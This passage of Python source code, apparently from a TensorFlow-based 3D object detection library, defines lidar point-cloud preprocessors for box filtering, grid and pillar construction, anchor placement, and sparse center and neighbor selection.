Modifies the bounding box data to turn off ground truth objects that don't
meet the params.min_num_points point filter:
labels.labels: Boxes with less than params.min_num_points have their label
set to params.background_id (defaults to 0).
labels.bboxes_3d_mask: Boxes with less than params.min_num_points are set
to 0.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define(
'min_num_points', 1, 'The minimum number of points allowed before '
'the associated ground truth box is turned off. Defaults to 1.')
p.Define(
'background_id', 0, 'The ID of the background class we set '
'filtered boxes to. Defaults to 0.')
return p
def TransformFeatures(self, features):
p = self.params
bbox_is_valid = tf.greater_equal(features.labels.bboxes_3d_num_points,
p.min_num_points)
features.labels.labels = tf.where(
bbox_is_valid, features.labels.labels,
p.background_id * tf.ones_like(features.labels.labels))
features.labels.bboxes_3d_mask *= tf.cast(bbox_is_valid, tf.float32)
return features
def TransformShapes(self, shapes):
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class FilterGroundTruthByDifficulty(Preprocessor):
"""Removes groundtruth boxes based on detection difficulty.
This preprocessor expects features to contain the following keys::
labels.single_frame_detection_difficulties of shape [..., L]
labels.labels of shape [..., L]
labels.bboxes_3d_mask of shape [..., L]
labels.unfiltered_bboxes_3d_mask of shape [..., L]
The preprocessor masks out the bboxes_3d_mask / labels based on whether
single_frame_detection_difficulties is greater than p.difficulty_threshold.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define(
'background_id', 0, 'The ID of the background class we set '
'filtered boxes to. Defaults to 0.')
p.Define(
'difficulty_threshold', 1,
'Filter groundtruth bounding boxes whose detection difficulty is '
'greater than `difficulty_threshold`')
return p
def TransformFeatures(self, features):
p = self.params
bbox_is_valid = tf.less_equal(
features.labels.single_frame_detection_difficulties,
p.difficulty_threshold)
features.labels.labels = tf.where(
bbox_is_valid, features.labels.labels,
p.background_id * tf.ones_like(features.labels.labels))
features.labels.bboxes_3d_mask *= tf.cast(bbox_is_valid, tf.float32)
return features
def TransformShapes(self, shapes):
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class CountNumberOfPointsInBoxes3D(Preprocessor):
"""Computes bboxes_3d_num_points.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [P, 3]
- labels.bboxes_3d of shape [L, 7]
- labels.bboxes_3d_mask of shape [L]
and optionally points_padding of shape [P] corresponding to the padding.
if points_padding is None, then all points are considered valid.
Adds the following features:
labels.bboxes_3d_num_points: [L] - integer tensor containing the number of
laser points for each corresponding bbox.
"""
def TransformFeatures(self, features):
points_xyz = features.lasers.points_xyz
if 'points_padding' in features.lasers:
points_mask = 1 - features.lasers.points_padding
points_xyz = tf.boolean_mask(points_xyz, points_mask)
points_in_bboxes_mask = geometry.IsWithinBBox3D(points_xyz,
features.labels.bboxes_3d)
bboxes_3d_num_points = tf.reduce_sum(
tf.cast(points_in_bboxes_mask, tf.int32), axis=0, keepdims=False)
bboxes_3d_num_points *= tf.cast(features.labels.bboxes_3d_mask, tf.int32)
features.labels.bboxes_3d_num_points = bboxes_3d_num_points
return features
def TransformShapes(self, shapes):
num_bboxes = shapes.labels.bboxes_3d[0]
shapes.labels.bboxes_3d_num_points = tf.TensorShape([num_bboxes])
return shapes
def TransformDTypes(self, dtypes):
dtypes.labels.bboxes_3d_num_points = tf.int32
return dtypes
class AddPerPointLabels(Preprocessor):
"""Computes the class and bbox id of each point.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [P, 3]
- labels.bboxes_3d of shape [L, 7]
- labels.labels of shape [L]
This makes an assumption that each point is only in 1 box, which should
almost always true in 3D. In cases where this is not true, the largest
label integer and largest bbox_id will be assigned.
NOTE: Be very careful that this is performed after any modifications
to the semantic labels of each point in the pointcloud. Examples of this
would be operators like GroundTruthAugmentation, or DropBoxesOutOfRange.
Adds the following features:
lasers.points_label: [P] - integer tensor containing the class id of each
point.
lasers.points_bbox_id: [P] - integer tensor containing box id of each
point from 0 to num_bboxes, where an id of num_bboxes indicates a
background point.
lasers.points_bbox_3d: [P, 7] - float tensor containing bounding box of
each point.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define(
'per_dimension_adjustment', None,
'A list of len 3 of floats with the amount (in meters) to add to '
'each dimension of the box before using it to select points. '
'If enabled, this is designed to protect against overly tight box '
'annotations that appear in KITTI.')
return p
def TransformFeatures(self, features):
p = self.params
points_xyz = features.lasers.points_xyz
bboxes_3d = features.labels.bboxes_3d
num_points, _ = py_utils.GetShape(points_xyz)
num_bboxes, _ = py_utils.GetShape(bboxes_3d)
if p.per_dimension_adjustment:
if len(p.per_dimension_adjustment) != 3:
raise ValueError(
'param `per_dimension_adjustment` expected to be len 3.')
dims_adjustment = tf.constant([0, 0, 0] + p.per_dimension_adjustment +
[0])
bboxes_3d = bboxes_3d + dims_adjustment
# Find which points are in each box and what class each box is.
points_in_bboxes_mask = geometry.IsWithinBBox3D(points_xyz, bboxes_3d)
points_in_bboxes_mask = tf.cast(points_in_bboxes_mask, tf.int32)
points_in_bboxes_mask = py_utils.HasShape(points_in_bboxes_mask,
[num_points, num_bboxes])
# points_in_bboxes_mask is a [num_points, num_bboxes] 0/1 tensor
# indicating whether that point is in a given box.
# Each point should only be in one box, so after broadcasting the label
# across the binary mask, we do a reduce_max to get the max label id
# for each point. Since each point only belongs to one box, it will be
# the only non-zero (background) label in that box.
# Note: We assume background to be class_id == 0
points_label = tf.reduce_max(
points_in_bboxes_mask * features.labels.labels, axis=1)
points_bbox_id = tf.argmax(
points_in_bboxes_mask, axis=1, output_type=tf.int32)
# If the class is background, make its id == num_bboxes
points_bbox_id = tf.where(points_label > 0, points_bbox_id,
tf.broadcast_to(num_bboxes, [num_points]))
# For each point, get the bbox_3d data.
dummy_bbox = tf.constant([[0, 0, 0, 0, 0, 0, 0]], dtype=tf.float32)
bboxes_3d = tf.concat([bboxes_3d, dummy_bbox], axis=0)
points_bbox_3d = tf.gather(bboxes_3d, points_bbox_id)
points_label = tf.reshape(points_label, [num_points])
points_bbox_id = tf.reshape(points_bbox_id, [num_points])
features.lasers.points_label = points_label
features.lasers.points_bbox_id = points_bbox_id
features.lasers.points_bbox_3d = points_bbox_3d
return features
def TransformShapes(self, shapes):
num_points = shapes.lasers.points_xyz[0]
shapes.lasers.points_label = tf.TensorShape([num_points])
shapes.lasers.points_bbox_id = tf.TensorShape([num_points])
shapes.lasers.points_bbox_3d = tf.TensorShape([num_points, 7])
return shapes
def TransformDTypes(self, dtypes):
dtypes.lasers.points_label = tf.int32
dtypes.lasers.points_bbox_id = tf.int32
dtypes.lasers.points_bbox_3d = tf.float32
return dtypes
class PointsToGrid(Preprocessor):
"""Bins points to a 3D-grid using custom op: ops.point_to_grid.
Expects features to have keys:
- lasers.points_xyz of shape [P, 3]
and optionally points_padding of shape [P] corresponding to the padding.
if points_padding is None, then all points are considered valid.
If normalizing the labels is enabled, then also expects:
- labels.weights
- labels.bboxes_td
- labels.bboxes_td_mask
- labels.bboxes_3d_mask
Let:
gx, gy, gz = p.grid_size
F = 3 + num_laser_features
Adds the following features:
grid_centers: [gx, gy, gz, 3]: For each grid cell, the (x,y,z)
floating point coordinate of its center.
grid_num_points: [gx, gy, gz]: The number of points in each grid
cell (integer).
laser_grid: [gx, gy, gz, num_points_per_cell, F] - A 5D floating
point Tensor containing the laser data placed into a fixed grid.
Modifies the bboxes in labels to also be within the grid range x/y by default.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('num_points_per_cell', 100,
'The maximum number of points per cell.')
p.Define('grid_size', (40, 40, 1), 'Grid size along x,y,z axis.')
# The max range of x and y is [-80, 80].
p.Define('grid_range_x', (-80, 80), 'The X-axis Range covered by the grid')
p.Define('grid_range_y', (-80, 80), 'The Y-axis Range covered by the grid')
p.Define('grid_range_z', (-2, 4), 'The Z-axis Range covered by the grid')
p.Define('normalize_td_labels', True,
'Whether to clip the labels to the grid limits.')
return p
def _NormalizeLabels(self, ymin, xmin, ymax, xmax, x_range, y_range):
"""Normalizes the bboxes within a given range."""
assert x_range, 'Must specify x_range if clipping.'
assert y_range, 'Must specify y_range if clipping.'
assert len(x_range) == 2, 'x_range %s must be 2 elements.' % x_range
assert len(y_range) == 2, 'y_range %s must be 2 elements.' % y_range
x_range_min = x_range[0]
x_range_len = x_range[1] - x_range[0]
y_range_min = y_range[0]
y_range_len = y_range[1] - y_range[0]
xmin = tf.cast(xmin - x_range_min, tf.float32) / tf.cast(
x_range_len, tf.float32)
xmax = tf.cast(xmax - x_range_min, tf.float32) / tf.cast(
x_range_len, tf.float32)
ymin = tf.cast(ymin - y_range_min, tf.float32) / tf.cast(
y_range_len, tf.float32)
ymax = tf.cast(ymax - y_range_min, tf.float32) / tf.cast(
y_range_len, tf.float32)
return ymin, xmin, ymax, xmax
def TransformFeatures(self, features):
p = self.params
points_xyz = features.lasers.points_xyz
points_feature = features.lasers.points_feature
if ('points_padding' in features.lasers and
features.lasers.points_padding is not None):
points_mask = 1 - features.lasers.points_padding
points_xyz = tf.boolean_mask(points_xyz, points_mask)
points_feature = tf.boolean_mask(points_feature, points_mask)
points_full = tf.concat([points_xyz, points_feature], axis=-1)
points_grid_full, grid_centers, num_points = ops.point_to_grid(
points_full, p.num_points_per_cell, p.grid_size[0], p.grid_size[1],
p.grid_size[2], p.grid_range_x, p.grid_range_y, p.grid_range_z)
features.laser_grid = points_grid_full
features.grid_centers = grid_centers
features.grid_num_points = num_points
if p.normalize_td_labels:
# Normalize bboxes_td w.r.t grid range.
obb = features.labels
x_range = p.grid_range_x
y_range = p.grid_range_y
ymin, xmin, ymax, xmax = tf.unstack(obb.bboxes_td[..., :4], axis=-1)
ymin, xmin, ymax, xmax = self._NormalizeLabels(
ymin, xmin, ymax, xmax, x_range=x_range, y_range=y_range)
obb.bboxes_td = tf.concat(
[tf.stack([ymin, xmin, ymax, xmax], axis=-1), obb.bboxes_td[..., 4:]],
axis=-1)
return features
def TransformShapes(self, shapes):
p = self.params
shapes.grid_centers = tf.TensorShape(list(p.grid_size) + [3])
shapes.grid_num_points = tf.TensorShape(list(p.grid_size))
shapes.laser_grid = tf.TensorShape(
list(p.grid_size) +
[p.num_points_per_cell, 3 + shapes.lasers.points_feature[-1]])
return shapes
def TransformDTypes(self, dtypes):
dtypes.grid_centers = tf.float32
dtypes.grid_num_points = tf.int32
dtypes.laser_grid = tf.float32
return dtypes
class _PointPillarGridSettings:
"""Settings for PointPillars model defined in paper.
https://arxiv.org/abs/1812.05784
"""
# Chooses grid sizes that are a multiple of 16 to support point pillars
# model requirements. These also happen to match the values
# in the PointPillars paper (voxel width of 0.16m in x, y)
GRID_X = 432
GRID_Y = 496
GRID_Z = 1
# These fields are set in the subclasses.
GRID_X_RANGE = None
GRID_Y_RANGE = None
GRID_Z_RANGE = None
@classmethod
def UpdateGridParams(cls, grid_params):
"""Apply PointPillars settings to grid_params."""
grid_params.grid_size = (cls.GRID_X, cls.GRID_Y, cls.GRID_Z)
grid_params.grid_range_x = cls.GRID_X_RANGE
grid_params.grid_range_y = cls.GRID_Y_RANGE
grid_params.grid_range_z = cls.GRID_Z_RANGE
@classmethod
def UpdateAnchorGridParams(cls, anchor_params, output_stride=2):
"""Apply PointPillars settings to anchor_params."""
# Set anchor settings to match grid settings.
# Grid size for anchors is half the resolution.
anchor_params.grid_size = (cls.GRID_X // output_stride,
cls.GRID_Y // output_stride, cls.GRID_Z)
anchor_params.grid_range_x = cls.GRID_X_RANGE
anchor_params.grid_range_y = cls.GRID_Y_RANGE
# Grid along z axis should be pinned to 0.
anchor_params.grid_range_z = (0, 0)
def MakeGridSettings(grid_x_range, grid_y_range, grid_z_range, grid_x, grid_y,
grid_z):
"""Returns configured class for PointPillar grid settings."""
class GridSettings(_PointPillarGridSettings):
GRID_X_RANGE = grid_x_range
GRID_Y_RANGE = grid_y_range
GRID_Z_RANGE = grid_z_range
GRID_X = grid_x
GRID_Y = grid_y
GRID_Z = grid_z
return GridSettings
PointPillarGridCarSettings = MakeGridSettings(
grid_x_range=(0, 69.12),
grid_y_range=(-39.68, 39.68),
grid_z_range=(-3, 1),
grid_x=432,
grid_y=496,
grid_z=1)
PointPillarGridPedCycSettings = MakeGridSettings(
grid_x_range=(0, 47.36),
grid_y_range=(-19.84, 19.84),
grid_z_range=(-2.5, 0.5),
grid_x=432,
grid_y=496,
grid_z=1)
class GridToPillars(Preprocessor):
"""Create pillars from a grid of points.
Expects features to have keys:
grid_centers: [gx, gy, gz, 3]
grid_num_points: [gx, gy, gz]
laser_grid: [gx, gy, gz, num_points_per_cell, F]
Adds the following features:
point_count: [num_pillars]. The number of points in the pillar.
point_locations: [num_pillars, 3]. The grid location of each pillar.
pillar_points: [num_pillars, num_points_per_cell, F]. Points of each
pillar.
Drops the following features by default:
laser_grid
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('num_points_per_cell', 100,
'The maximum number of points per cell.')
p.Define('num_pillars', 12000, 'The maximum number of pillars to produce.')
p.Define('drop_laser_grid', True, 'Whether to drop the laser_grid feature.')
# The density based sampler is more expensive.
p.Define('use_density_sampler', False,
'Use a density based sampler during pillar selection.')
return p
def _GumbelTransform(self, probs):
"""Adds gumbel noise to log probabilities for multinomial sampling.
This enables fast sampling from a multinomial distribution without
replacement. See https://arxiv.org/abs/1611.01144 for details.
A colab that demonstrates this in practice is here:
http://colab/drive/1iuMt2n_r7dKPQG9T0UVMuK3fkbBayKjd
Args:
probs: A 1-D float tensor containing probabilities, summing to 1.
Returns:
A 1-D float tensor of the same size of probs, with gumbel noise added to
log probabilities. Taking the top k elements from this provides a
multinomial sample without replacement.
"""
p = self.params
log_prob = tf.math.log(probs)
probs_shape = tf.shape(probs)
uniform_samples = tf.random.uniform(
shape=probs_shape,
dtype=probs.dtype,
seed=p.random_seed,
name='uniform_samples')
gumbel_noise = -tf.math.log(-tf.math.log(uniform_samples))
return gumbel_noise + log_prob
def _DensitySample(self, num_points):
p = self.params
# Flatten to [nx * ny * nz] for convenience during sampling.
num_grid_points = np.prod(p.grid_size)
flattened_num_points = tf.reshape(num_points, [num_grid_points])
# Normalize flattened_num_points to sum to 1.
flattened_num_points = tf.cast(flattened_num_points, tf.float32)
flattened_num_points /= tf.reduce_sum(flattened_num_points)
# TODO(jngiam): Consider generalizing this to enable other methods of
# sampling: e.g., use largest deviation in z-axis. The gumbel transform
# can still be applied regardless.
# Add gumbel noise for multinomial sampling.
sampling_logits = self._GumbelTransform(flattened_num_points)
_, locations = tf.nn.top_k(
sampling_logits, k=min(p.num_pillars, num_grid_points))
# Unravel coordinates back to grid locations.
locations = tf.unravel_index(locations, p.grid_size)
# Unravel index will return a 3 x num_locations tensor, this needs to be
# transposed so that we have it as num_locations x 3.
locations = py_utils.HasShape(locations, [3, -1])
locations = tf.transpose(locations)
return locations
def TransformFeatures(self, features):
p = self.params
num_points = features.grid_num_points
if p.use_density_sampler:
locations = self._DensitySample(num_points)
else:
# Select non-empty cells uniformly at random.
locations = tf.random.shuffle(tf.cast(tf.where(num_points > 0), tf.int32))
num_features = py_utils.GetShape(features.laser_grid)[-1]
# [nx, ny, nz, np, 4] (x, y, z, f)
points = features.laser_grid
# [K, np, 4] (x, y, z, f)
points = tf.gather_nd(points, locations)
# [nx, ny, nz, 1, 3] (cx, cy, cz)
centers = features.grid_centers[..., tf.newaxis, :]
# [K, 1, 3] (cx, cy, cz)
centers = tf.gather_nd(centers, locations)
# NOTE: If there are fewer pillars than p.num_pillars, the following
# padding creates many 'fake' pillars at grid cell (0, 0, 0) with
# an all-zero pillar. Hopefully, the model can learn to ignore these.
#
# pillar_points[i, :, :] is the pillar located at pillar_locations[i, :3],
# and pillar_points[i, :, :] == points_grid_full[pillar_locations[i, :3]].
# for 0 <= i < pillar_count;
# pillar_locations[i, :3] are zero-ed, for i >= pillar_count.
features.pillar_count = tf.shape(locations)[0]
features.pillar_locations = py_utils.PadOrTrimTo(locations,
[p.num_pillars, 3])
features.pillar_points = py_utils.PadOrTrimTo(
points, [p.num_pillars, p.num_points_per_cell, num_features])
features.pillar_centers = py_utils.PadOrTrimTo(centers,
[p.num_pillars, 1, 3])
if p.drop_laser_grid:
del features['laser_grid']
return features
def TransformShapes(self, shapes):
p = self.params
num_features = shapes.laser_grid[-1]
shapes.pillar_count = tf.TensorShape([])
shapes.pillar_locations = tf.TensorShape([p.num_pillars, 3])
shapes.pillar_points = tf.TensorShape(
[p.num_pillars, p.num_points_per_cell, num_features])
shapes.pillar_centers = tf.TensorShape([p.num_pillars, 1, 3])
if p.drop_laser_grid:
del shapes['laser_grid']
return shapes
def TransformDTypes(self, dtypes):
p = self.params
dtypes.pillar_count = tf.int32
dtypes.pillar_locations = tf.int32
dtypes.pillar_points = tf.float32
dtypes.pillar_centers = tf.float32
if p.drop_laser_grid:
del dtypes['laser_grid']
return dtypes
class GridAnchorCenters(Preprocessor):
"""Create anchor centers on a grid.
Anchors are placed in the middle of each grid cell. For example, on a 2D grid
range (0 -> 10, 0 -> 10) with a 10 x 5 grid size, the anchors will be placed
at [(0.5, 1), (0.5, 3), ... , (9.5, 7), (9.5, 9)].
Adds the following features:
anchor_centers: [num_locations, 3] - Floating point output containing the
center (x, y, z) locations for tiling anchor boxes.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define(
'grid_size', (20, 20, 1), 'Grid size along x,y,z axis. This will '
'be used to generate the anchor center locations. Note that this '
'would likely be different from the grid_* parameters in '
'LaserGridExtractor: the grid extractor may choose to extract '
'points more densely. Instead, this should correspond to the '
'model\'s prediction layer: the predicted anchor box residuals '
'should match this grid.')
p.Define('grid_range_x', (-25, 25), 'The x-axis range covered by the grid.')
p.Define('grid_range_y', (-25, 25), 'The y-axis range covered by the grid.')
p.Define('grid_range_z', (0, 0), 'The z-axis range covered by the grid.')
return p
def TransformFeatures(self, features):
p = self.params
utils_3d = detection_3d_lib.Utils3D()
# Compute the grid cell size and adjust the range sent to dense coordinates
# by half a cell size so as to ensure that the anchors are placed in the
# center of each grid cell.
grid_size_x, grid_size_y, grid_size_z = p.grid_size
grid_cell_sizes = [
float(p.grid_range_x[1] - p.grid_range_x[0]) / grid_size_x,
float(p.grid_range_y[1] - p.grid_range_y[0]) / grid_size_y,
float(p.grid_range_z[1] - p.grid_range_z[0]) / grid_size_z,
]
half_size_x, half_size_y, half_size_z = np.asarray(grid_cell_sizes) / 2.0
grid_shape = list(p.grid_size) + [3]
anchor_centers = utils_3d.CreateDenseCoordinates([
[
p.grid_range_x[0] + half_size_x,
p.grid_range_x[1] - half_size_x,
grid_size_x
],
[
p.grid_range_y[0] + half_size_y,
p.grid_range_y[1] - half_size_y,
grid_size_y
],
[
p.grid_range_z[0] + half_size_z,
p.grid_range_z[1] - half_size_z,
grid_size_z
],
]) # pyformat: disable
features.anchor_centers = tf.reshape(anchor_centers, grid_shape)
return features
def TransformShapes(self, shapes):
p = self.params
shapes.anchor_centers = tf.TensorShape(list(p.grid_size) + [3])
return shapes
def TransformDTypes(self, dtypes):
dtypes.anchor_centers = tf.float32
return dtypes
class SparseCenterSelector(Preprocessor):
"""Select centers for anchors and cells.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [P, 3]
and optionally points_padding of shape [P] corresponding to the padding.
if points_padding is None, then all points are considered valid.
If lasers.num_seeded_points of shape [] is provided, it indicates that the
first num_seeded_points of lasers.points_xyz should be used as seeds for
farthest point sampling (e.g., always chosen). Currently the concept
of seeding is not implemented for anything but farthest point sampling.
Adds the following features:
anchor_centers: [num_cell_centers, 3] - Floating point output containing the
center (x, y, z) locations for tiling anchor boxes.
cell_center_xyz: [num_cell_centers, 3] - Floating point output containing
the center (x, y, z) locations for each cell to featurize.
"""
_SAMPLING_METHODS = ['farthest_point', 'random_uniform']
@classmethod
def Params(cls):
p = super().Params()
p.Define('num_cell_centers', 256, 'Number of centers.')
p.Define(
'features_preparation_layers', [],
'A list of Params for layers to run on the features before '
'performing farthest point sampling. For example, one may wish to '
'drop points out of frustum for KITTI before selecting centers. '
'Note that these layers will not mutate the original features, '
'instead, a copy will be made.')
p.Define(
'sampling_method', 'farthest_point',
'Which sampling method to use. One of {}'.format(cls._SAMPLING_METHODS))
p.Define(
'fix_z_to_zero', True, 'Whether to fix z to 0 when retrieving the '
'center xyz coordinates.')
return p
def __init__(self, params):
super().__init__(params)
p = self.params
if p.sampling_method not in self._SAMPLING_METHODS:
raise ValueError('Param `sampling_method` must be one of {}.'.format(
self._SAMPLING_METHODS))
if p.features_preparation_layers is not None:
self.CreateChildren('features_preparation_layers',
p.features_preparation_layers)
def _FarthestPointSampleCenters(self, points_xyz, num_seeded_points):
"""Samples centers with Farthest Point Sampling.
Args:
points_xyz: An unpadded tf.float32 Tensor of shape [P, 3] with per point
(x, y, z) locations. We expect any padded points to be removed before
this function is called.
num_seeded_points: integer indicating how many of the first
num_seeded_points points in points_xyz should be considered
as seeds for FPS (always chosen).
Returns:
A tf.float32 Tensor of shape [p.num_cell_centers, 3] with selected centers
to use as anchors.
"""
p = self.params
num_points = tf.shape(points_xyz)[0]
points_padding = tf.zeros((num_points,), dtype=tf.float32)
padded_num_points = tf.maximum(num_points, p.num_cell_centers)
# Pad both the points and padding if for some reason the input pointcloud
# has less points than p.num_cell_centers.
points_xy = py_utils.PadOrTrimTo(points_xyz[:, :2], [padded_num_points, 2])
points_padding = py_utils.PadOrTrimTo(
points_padding, [padded_num_points], pad_val=1.0)
sampled_idx, _ = car_lib.FarthestPointSampler(
points_xy[tf.newaxis, ...],
points_padding[tf.newaxis, ...],
p.num_cell_centers,
num_seeded_points=num_seeded_points,
random_seed=p.random_seed)
sampled_idx = sampled_idx[0, :]
# Gather centers.
if p.fix_z_to_zero:
centers = tf.concat([
tf.gather(points_xy, sampled_idx),
tf.zeros((p.num_cell_centers, 1)),
], axis=-1) # pyformat: disable
else:
centers = tf.gather(points_xyz, sampled_idx)
return centers
def _RandomUniformSampleCenters(self, points_xyz):
"""Samples centers with Random Uniform Sampling.
Args:
points_xyz: An unpadded tf.float32 Tensor of shape [P, 3] with per point
(x, y, z) locations. We expect any padded points to be removed before
this function is called.
Returns:
A tf.float32 Tensor of shape [p.num_cell_centers, 3] with selected centers
to use as anchors.
"""
p = self.params
# We want the center Z value to be 0 so just exclude it
centers_xy = tf.random.shuffle(points_xyz[:, :2], seed=p.random_seed)
selected_centers_xy = py_utils.PadOrTrimTo(centers_xy,
[p.num_cell_centers, 2])
return tf.concat([selected_centers_xy,
tf.zeros((p.num_cell_centers, 1))],
axis=-1)
def _SampleCenters(self, points_xyz, num_seeded_points):
p = self.params
if p.sampling_method == 'farthest_point':
return self._FarthestPointSampleCenters(points_xyz, num_seeded_points)
elif p.sampling_method == 'random_uniform':
if num_seeded_points > 0:
raise NotImplementedError(
'Random sampling with seeded points not yet implemented.')
return self._RandomUniformSampleCenters(points_xyz)
else:
raise ValueError('Param `sampling_method` must be one of {}.'.format(
self._SAMPLING_METHODS))
def TransformFeatures(self, features):
p = self.params
prepared_features = features.DeepCopy()
for prep_layer in self.features_preparation_layers:
prepared_features = prep_layer.FPropDefaultTheta(prepared_features)
num_seeded_points = prepared_features.lasers.get('num_seeded_points', 0)
points_data = prepared_features.lasers
points_xyz = points_data.points_xyz
if 'points_padding' in points_data:
points_padding = points_data.points_padding
points_mask = 1 - points_padding
points_xyz = tf.boolean_mask(points_xyz, points_mask)
centers = self._SampleCenters(points_xyz, num_seeded_points)
centers = py_utils.HasShape(centers, [p.num_cell_centers, 3])
features.anchor_centers = centers
features.cell_center_xyz = centers
return features
def TransformShapes(self, shapes):
p = self.params
shapes.anchor_centers = tf.TensorShape([p.num_cell_centers, 3])
shapes.cell_center_xyz = tf.TensorShape([p.num_cell_centers, 3])
return shapes
def TransformDTypes(self, dtypes):
dtypes.anchor_centers = tf.float32
dtypes.cell_center_xyz = tf.float32
return dtypes
class SparseCellGatherFeatures(Preprocessor):
"""Select local features for each cell.
This preprocessor expects features to contain:
- lasers.points_xyz of shape [P, 3]
- lasers.points_feature of shape [P, F]
- cell_center_xyz of shape [C, 3]
and optionally points_padding of shape [P] corresponding to the padding.
if points_padding is None, then all points are considered valid.
Adds the following features:
cell_points_xyz: [num_centers, num_points_per_cell, 3] - Floating point
output containing the (x, y, z) locations for each point for a given
center.
cell_feature: [num_centers, num_points_per_cell, F] - Floating point output
containing the features for each point for a given center.
cell_points_padding: [num_centers, num_points_per_cell] - 0/1 padding
for the points in each cell.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('num_points_per_cell', 128, 'The number of points per cell.')
p.Define('max_distance', 3.0, 'Max distance of point to cell center.')
p.Define(
'sample_neighbors_uniformly', False,
'Whether to sample the neighbor points for every cell center '
'uniformly at random. If False, this will default to selecting by '
'distance.')
return p
def TransformFeatures(self, features):
p = self.params
num_centers = py_utils.GetShape(features.cell_center_xyz, 1)[0]
num_features = py_utils.GetShape(features.lasers.points_feature)[-1]
points_xyz = features.lasers.points_xyz
points_feature = features.lasers.points_feature
if 'points_padding' in features.lasers:
points_mask = 1 - features.lasers.points_padding
points_xyz = tf.boolean_mask(points_xyz, points_mask)
points_feature = tf.boolean_mask(points_feature, points_mask)
# Note: points_xyz and points_feature must be unpadded as we pass
# padding=None to neighborhood indices. Ensuring that it is unpadded
# helps improve performance.
# Get nearby points using kNN.
sample_indices, sample_indices_padding = car_lib.NeighborhoodIndices(
tf.expand_dims(points_xyz, 0),
tf.expand_dims(features.cell_center_xyz, 0),
p.num_points_per_cell,
points_padding=None,
max_distance=p.max_distance,
sample_neighbors_uniformly=p.sample_neighbors_uniformly)
# Take first example since NeighboorhoodIndices expects batch dimension.
sample_indices = sample_indices[0, :, :]
sample_indices_padding = sample_indices_padding[0, :, :]
sample_indices = py_utils.HasShape(sample_indices,
[num_centers, p.num_points_per_cell])
cell_points_xyz = tf.gather(points_xyz, sample_indices)
cell_points_xyz = py_utils.HasShape(cell_points_xyz,
[num_centers, p.num_points_per_cell, 3])
cell_feature = tf.gather(points_feature, sample_indices)
cell_feature = py_utils.HasShape(
cell_feature, [num_centers, p.num_points_per_cell, num_features])
cell_points_padding = py_utils.HasShape(
sample_indices_padding, [num_centers, p.num_points_per_cell])
features.update({
'cell_points_xyz': cell_points_xyz,
'cell_feature': cell_feature,
'cell_points_padding': cell_points_padding,
})
return features
def TransformShapes(self, shapes):
p = self.params
num_centers = shapes.cell_center_xyz[0]
base_shape = [num_centers, p.num_points_per_cell]
num_features = shapes.lasers.points_feature[-1]
shapes.cell_points_xyz = tf.TensorShape(base_shape + [3])
shapes.cell_feature = tf.TensorShape(base_shape + [num_features])
shapes.cell_points_padding = tf.TensorShape(base_shape)
return shapes
def TransformDTypes(self, dtypes):
dtypes.cell_points_xyz = tf.float32
dtypes.cell_feature = tf.float32
dtypes.cell_points_padding = tf.float32
return dtypes
class SparseCellCentersTopK(Preprocessor):
"""Given selected centers and gathered points/features, apply a filter.
This preprocessor expects features to contain `cell_center_xyz` and all
entries in params.features_to_modify, and that the leading dimension should
all be the same (num_cell_centers from SparseCenterSelector).
We then modify all values in features that are specified in
params.features_to_modify by sorting them with the specified sort function
(specified by params.sort_by) operating on features.cell_center_xyz, and then
taking the top K (specified by params.num_cell_centers) along the first
dimension.
"""
_REGISTERED_SORT_FUNCTIONS = ['distance']
@classmethod
def Params(cls):
p = super().Params()
p.Define('num_cell_centers', 512, 'The number of centers after filtering.')
p.Define(
'sort_by', 'distance', 'A string specifying which sort function '
'to use. Currently we just support `distance`.')
p.Define('features_to_modify', [
'cell_center_xyz', 'anchor_centers', 'cell_points_xyz', 'cell_feature',
'cell_points_padding'
], 'A list of keys from the features dict to modify.')
return p
def __init__(self, params):
super().__init__(params)
p = self.params
if p.sort_by not in self._REGISTERED_SORT_FUNCTIONS:
raise ValueError('{} not supported. We only support {}.'.format(
p.sort_by, self._REGISTERED_SORT_FUNCTIONS))
if len(p.features_to_modify) < 1:
raise ValueError('Need to modify at least one feature.')
def _SortByDistance(self, features):
dist = tf.linalg.norm(features.cell_center_xyz, axis=-1)
return tf.argsort(dist, axis=-1, direction='ASCENDING')
def _Sort(self, features):
p = self.params
if p.sort_by == 'distance':
return self._SortByDistance(features)
else:
raise ValueError('Unsupported sort function: {}.'.format(p.sort_by))
def TransformFeatures(self, features):
p = self.params
sort_indices = self._Sort(features)
sort_indices_top_k = sort_indices[:p.num_cell_centers, ...]
# Gather each of the relevant items
for key in p.features_to_modify:
shape = py_utils.GetShape(features[key])
output_shape = [p.num_cell_centers] + shape[1:]
features[key] = py_utils.PadOrTrimTo(
tf.gather(features[key], sort_indices_top_k), output_shape)
return features
def TransformShapes(self, shapes):
p = self.params
for key in p.features_to_modify:
shapes[key] = tf.TensorShape([p.num_cell_centers] + shapes[key][1:])
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class TileAnchorBBoxes(Preprocessor):
"""Creates anchor_bboxes given anchor_centers.
This preprocessor expects features to contain the following keys:
- anchor_centers of shape [...base shape..., 3]
Adds the following features:
anchor_bboxes: base_shape + [7] - Floating point anchor box
output containing the anchor boxes and the 7 floating point
values for each box that define the box (x, y, z, dx, dy, dz, phi).
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('anchor_box_dimensions', [],
'List of anchor box sizes per center.')
p.Define('anchor_box_offsets', [], 'List of anchor box offsets per center.')
p.Define('anchor_box_rotations', [],
'List of anchor box rotations per center.')
return p
def TransformFeatures(self, features):
p = self.params
utils_3d = detection_3d_lib.Utils3D()
assert p.anchor_box_dimensions
assert p.anchor_box_offsets
assert p.anchor_box_rotations
base_shape = py_utils.GetShape(features.anchor_centers)[:-1]
num_box_per_center = len(p.anchor_box_dimensions)
anchor_centers = tf.reshape(features.anchor_centers, [-1, 3])
anchor_bboxes = utils_3d.MakeAnchorBoxes(
anchor_centers, tf.identity(p.anchor_box_dimensions),
